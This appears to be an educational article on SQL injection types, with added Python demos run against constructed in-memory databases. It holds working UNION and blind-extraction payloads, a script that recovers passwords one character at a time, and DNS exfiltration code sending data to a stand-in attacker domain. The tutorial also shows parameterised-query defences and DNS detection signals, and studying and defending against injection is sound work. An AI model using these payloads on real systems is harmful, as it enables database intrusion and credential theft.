
What is SQL Injection and What Are the Types of SQL Injection?


SQL injection is a web application vulnerability that lets an attacker interfere with the SQL queries an application sends to its database. It usually allows the attacker to read data they should not have access to: records belonging to other users, password hashes, or any other sensitive information. In many cases the attacker can also modify or delete that data.

SQL injections typically fall into three categories as listed below:

  1. In-band SQLi (Classic)
  2. Inferential SQLi (Blind SQL Injection)
  3. Out-of-band SQLi

The types are distinguished by the technique the attacker uses to reach the backend data and by how much damage they can do.

In-band SQLi

In-band SQL injection is the most common and the easiest to exploit class of SQL injection.

In this type, the attacker uses the same communication channel both to launch the attack and to collect its results.

This is further divided into two sub-variations:

  • Error-based SQLi: the attacker relies on error messages returned by the database server to learn about its structure. The attacker deliberately sends input that makes the database raise an error, and the error text (a table or column name, or a value that failed a type conversion) is what leaks. On a database that reports errors verbosely, this technique alone can be enough to enumerate the entire database.
Example - 
  • Union-based SQLi: the attacker uses the UNION SQL operator to append a SELECT statement of their own to the application's query, so the database combines both result sets and the application returns the merged rows in its HTTP response. The injected SELECT must return the same number of columns as the original query, with compatible data types, which is why the attack usually starts by probing the column count. The extra rows can carry data from any table the application's database account is allowed to read.
Example - 
' UNION SELECT username, password FROM users--
' UNION SELECT username || '~' || password FROM users--
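The following is an added example, not code from the original article. It uses an in-memory SQLite database as a stand-in for the application's backend, builds the search query by string concatenation the way a vulnerable application does, and then runs the page's UNION payload against it. It also shows the column-count probe that precedes a real UNION attack (SQLite, like other engines, raises an error when the two SELECTs disagree on column count, which is the same signal error-based injection relies on) and the parameterised form of the query, against which the identical payload returns nothing. Table and column names and the sample rows are constructed for the demo.

```python
import sqlite3

# Constructed demo schema: a product catalogue plus a users table that the
# search feature was never meant to expose.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, category TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO products (name, category)
    VALUES ('Lamp', 'home'), ('Kettle', 'home'), ('Cable', 'tech');
INSERT INTO users (username, password)
    VALUES ('administrator', 'hunter2'), ('carlos', 'montoya');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, category):
    """The injectable pattern: user input is pasted straight into the SQL text,
    so a quote in the input ends the string literal and the rest is parsed as SQL."""
    query = f"SELECT name, category FROM products WHERE category = '{category}'"
    return conn.execute(query).fetchall()


def search_parameterised(conn, category):
    """Same query with a bound parameter: the input is always data, never SQL,
    so the payload is simply looked up as a (non-existent) category name."""
    return conn.execute(
        "SELECT name, category FROM products WHERE category = ?", (category,)
    ).fetchall()


def probe_column_count(conn, max_cols=10):
    """Step one of a UNION attack: find how many columns the original SELECT
    returns by adding NULLs until the database stops raising an error. The
    error itself is the information leak that error-based injection exploits."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ", ".join(["NULL"] * n) + "--"
        try:
            search_vulnerable(conn, payload)
            return n
        except sqlite3.OperationalError:
            continue  # column count mismatch: try one more column
    return None


# The page's own union payload: two columns, matching the original SELECT.
UNION_PAYLOAD = "' UNION SELECT username, password FROM users--"


def demo():
    conn = connect()
    leaked = search_vulnerable(conn, UNION_PAYLOAD)      # users' credentials come back
    safe = search_parameterised(conn, UNION_PAYLOAD)     # empty: no such category
    return leaked, safe


if __name__ == "__main__":
    print("columns:", probe_column_count(connect()))
    leaked_rows, safe_rows = demo()
    print("vulnerable:", leaked_rows)
    print("parameterised:", safe_rows)
```

The query the database actually sees in the vulnerable path is `SELECT name, category FROM products WHERE category = '' UNION SELECT username, password FROM users--'`: the first SELECT matches no product, so every row returned comes from the users table.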

Inferential SQLi (Blind SQLi)

This method is called blind SQLi because the application does not return the results of the injected query in its responses, so the attacker cannot read the output of the attack directly. Instead the attacker sends a payload to the server and infers facts about the database from the server's behaviour: a change in the page content, or a delay in the response.

Blind SQL injections are further classified as follows:

  • Boolean-based blind SQLi: the attacker injects a condition into the query so that it evaluates to either true or false. Depending on the outcome, the content of the HTTP response changes or stays the same, which tells the attacker whether the condition held. Asking one yes/no question per request, the attacker can test guesses about the data until the correct value is confirmed.
Example -
xyz' AND (SELECT CASE WHEN (Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') THEN 1/0 ELSE 'a' END FROM Users)='a

This payload does not look for the letter 'a'. The CASE expression raises a divide-by-zero error only when the condition is true, that is, when the first character of the Administrator's password sorts after 'm'; otherwise it returns 'a' and the WHERE clause matches normally. The attacker watches whether the application errors (or otherwise changes its response) and so learns one fact about that character. Repeating this with other comparison characters and positions recovers the whole password one character at a time.
  • Time-based blind SQLi: the attacker injects a query that asks the database to pause for a given time before responding, but only if a chosen condition is true. If the response is delayed, the condition was true; if it comes back immediately, it was false. Even though no data from the database is returned, the attacker can enumerate the database this way. The process is slow, because each request yields one answer and the data has to be recovered character by character. The example below uses Microsoft SQL Server's WAITFOR DELAY; {delay} stands for the number of seconds to wait.
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
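The loop below is an added example, not part of the original article, showing the character-by-character enumeration that both the boolean-based and time-based payloads above drive. It generalises the single comparison in the page's example (`SUBSTRING(Password, 1, 1) > 'm'`) into a binary search, so each character costs about seven requests instead of up to 95. A vulnerable "tracking cookie" endpoint backed by an in-memory SQLite database stands in for the web application; the only thing the attacker sees is whether a welcome banner appears. The table, column and sample values are constructed, and the `unicode()` / `substr()` / `length()` functions are SQLite's; on SQL Server the same predicates would be `ASCII(SUBSTRING(...))` and `LEN(...)`.

```python
import sqlite3

# Constructed demo data, not from the original article.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE tracking (id TEXT);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO tracking VALUES ('abc123');
INSERT INTO users VALUES ('administrator', 's3cret!Pa55'), ('wiener', 'peter');
""")

REQUESTS = 0  # how many HTTP requests the extraction would have cost


def shows_welcome(tracking_id):
    """Vulnerable endpoint: the cookie value is concatenated into the query and the
    page shows a 'Welcome back' banner only if the query returns a row. A query
    that fails to parse just renders the page without the banner."""
    global REQUESTS
    REQUESTS += 1
    sql = f"SELECT 1 FROM tracking WHERE id = '{tracking_id}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def ask(condition):
    """One yes/no question: a known-valid id AND the attacker's condition.
    True comes back as the banner being present, False as it being absent.
    A time-based variant would use the same question with a WAITFOR/sleep in
    the true branch and measure the response time instead."""
    return shows_welcome(f"abc123' AND ({condition})--")


def search_greater(pred_greater, lo, hi):
    """Binary search for an integer in [lo, hi] when the only available
    question is 'is the value greater than n?' (the page's '> m' comparison)."""
    while lo < hi:
        mid = (lo + hi) // 2
        if pred_greater(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_password(user="administrator", max_len=64):
    """Recover one user's password: first its length, then each character's
    code point, every step answered only by 'banner present / absent'."""
    sub = f"(SELECT {{expr}} FROM users WHERE username = '{user}')"
    length = search_greater(
        lambda n: ask(f"{sub.format(expr='length(password)')} > {n}"), 0, max_len
    )
    chars = []
    for pos in range(1, length + 1):
        expr = f"unicode(substr(password, {pos}, 1))"
        code = search_greater(
            lambda n: ask(f"{sub.format(expr=expr)} > {n}"), 32, 126  # printable ASCII
        )
        chars.append(chr(code))
    return "".join(chars)


def request_count():
    return REQUESTS


if __name__ == "__main__":
    print(extract_password(), "recovered in", request_count(), "requests")
```

Every request the endpoint sees looks like `SELECT 1 FROM tracking WHERE id = 'abc123' AND ((SELECT unicode(substr(password, 1, 1)) FROM users WHERE username = 'administrator') > 109)--'`; no password data ever appears in a response, only the presence or absence of the banner.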

Out-of-band SQLi

Out-of-band SQL injection is only possible when the database server used by the application has the necessary features enabled, such as outbound network access and the functions or stored procedures that trigger it. It is mainly used as an alternative to the in-band and blind techniques, typically when the server's responses are not stable enough for time-based inference to be reliable, or when the injected query runs asynchronously and its outcome never reaches the HTTP response at all.

Out-of-band techniques rely on the database server's ability to make HTTP or DNS requests, which carry the data out to a server the attacker controls.

Example - 
'; exec master..xp_dirtree 
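The following is an added example, not code from the original article. It shows the full form of the SQL Server `xp_dirtree` payload above (the procedure resolves the hostname in the UNC path before it tries to list the share, which is the DNS request the attacker is after), and the part of the technique that happens on the attacker's side: shaping a secret so it fits into DNS labels and reassembling it from the listener's query log. The listener domain `oob.attacker.example`, the log line format and the sample data are all assumptions made for the demo.

```python
import re

# Assumed attacker-controlled listener domain: not a real host, not from the article.
ATTACKER_DOMAIN = "oob.attacker.example"
MAX_LABEL = 63      # RFC 1035: a single DNS label is at most 63 octets
CHUNK = 60          # hex characters of payload carried in each query's data label


def build_canary_payload(hostname):
    """One-shot check that the database can resolve attacker-chosen names at all.
    Microsoft SQL Server form, as in the page's truncated example."""
    return f"'; exec master..xp_dirtree '//{hostname}/a'--"


def encode_exfil(data):
    """Shape a secret so it survives a DNS lookup: hex encoding (only
    hostname-safe characters), split into labels of at most 63 characters, and
    a sequence-number label so the listener can reorder queries that arrive
    out of order or are retried by intermediate resolvers."""
    hexed = data.hex()
    chunks = [hexed[i:i + CHUNK] for i in range(0, len(hexed), CHUNK)]
    return [f"{seq}.{chunk}.{ATTACKER_DOMAIN}" for seq, chunk in enumerate(chunks)]


QNAME_RE = re.compile(r"^(\d+)\.([0-9a-f]+)\." + re.escape(ATTACKER_DOMAIN) + r"\.?$")


def decode_from_dns_log(log_lines):
    """Reassemble the secret from the listener's query log. Each line is assumed
    to be '<timestamp> <client-ip> <qname> <qtype>'. Duplicate queries (resolver
    retries) and unrelated names are ignored; a missing middle chunk makes the
    result None rather than a silently truncated secret."""
    pieces = {}
    for line in log_lines:
        fields = line.split()
        if len(fields) < 4:
            continue
        match = QNAME_RE.match(fields[2].lower())
        if not match:
            continue
        pieces[int(match.group(1))] = match.group(2)
    if not pieces or sorted(pieces) != list(range(len(pieces))):
        return None
    return bytes.fromhex("".join(pieces[i] for i in sorted(pieces)))


# Constructed secret long enough to need two queries (40 bytes -> 80 hex chars).
SECRET = b"administrator:s3cret!Pa55;carlos:montoya"


def demo():
    """Constructed listener log: the two exfil queries arrive in reverse order,
    one of them is retried by the resolver, and an unrelated lookup is mixed in."""
    names = encode_exfil(SECRET)
    log = [
        f"2024-05-01T10:00:02Z 203.0.113.7 {names[1]} A",
        f"2024-05-01T10:00:02Z 203.0.113.7 {names[0]} A",
        f"2024-05-01T10:00:03Z 203.0.113.7 {names[1]} A",          # resolver retry
        f"2024-05-01T10:00:04Z 198.51.100.9 www.example.com A",   # unrelated noise
    ]
    return decode_from_dns_log(log)


if __name__ == "__main__":
    print(build_canary_payload("canary." + ATTACKER_DOMAIN))
    for name in encode_exfil(SECRET):
        print(name)
    print(demo())
```

The same label-length and character-set constraints are what make out-of-band DNS exfiltration visible to defenders: long, high-entropy hexadecimal labels under a domain the organisation has never resolved before are a reliable hunting signal in resolver logs.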


